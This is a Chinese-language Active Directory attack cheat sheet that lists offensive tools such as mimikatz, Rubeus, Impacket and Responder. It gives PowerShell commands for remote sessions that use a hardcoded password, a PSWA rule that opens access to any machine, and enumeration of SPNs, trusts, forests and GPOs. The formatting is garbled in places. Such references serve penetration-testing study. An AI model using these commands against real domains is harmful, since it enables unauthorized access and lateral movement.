
你可以在这里支持我 🐱 :
这份 AD 攻击速查表由 RistBS 制作,灵感来源于 Active-Directory-Exploitation-Cheat-Sheet 仓库。
PowerShell 工具:
[⭐] Nishang -> https://github.com/samratashok/nishangNishang 包含多个适用于 Windows 渗透测试的 PowerShell 环境下的有用脚本。
PowerView 是 PowerSploit 中的一个脚本,可用于枚举 AD 架构以实现潜在的横向移动。
枚举工具:
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeAD 利用工具包:
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeo转储工具:
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/Rubeus监听器工具:
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### PSWA 滥用
允许任何拥有凭证的人连接到任何机器和任何配置
**[ ! ] 此操作需要凭证。**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *
使用 PowerView :```powershell Get-NetUser –SPN
> 使用 [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) :```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
MapTrust :```powershell Invoke-MapDomainTrust
**当前域的域信任 :**
> 使用 [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) :```powershell
Get-NetDomainTrust #Find potential external trust
Get-NetDomainTrust –Domain $domain
使用 AD Module :```powershell Get-ADTrust Get-ADTrust –Identity $domain
### 森林枚举
**关于当前森林的详细信息:**```powershell
Get-NetForest
Get-NetForest –Forest $forest
Get-ADForest
Get-ADForest –Identity $domain
GPO列表```powershell Get-NetGPO Get-NetGPO -ComputerName $computer Get-GPO -All Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
### ACL与ACE枚举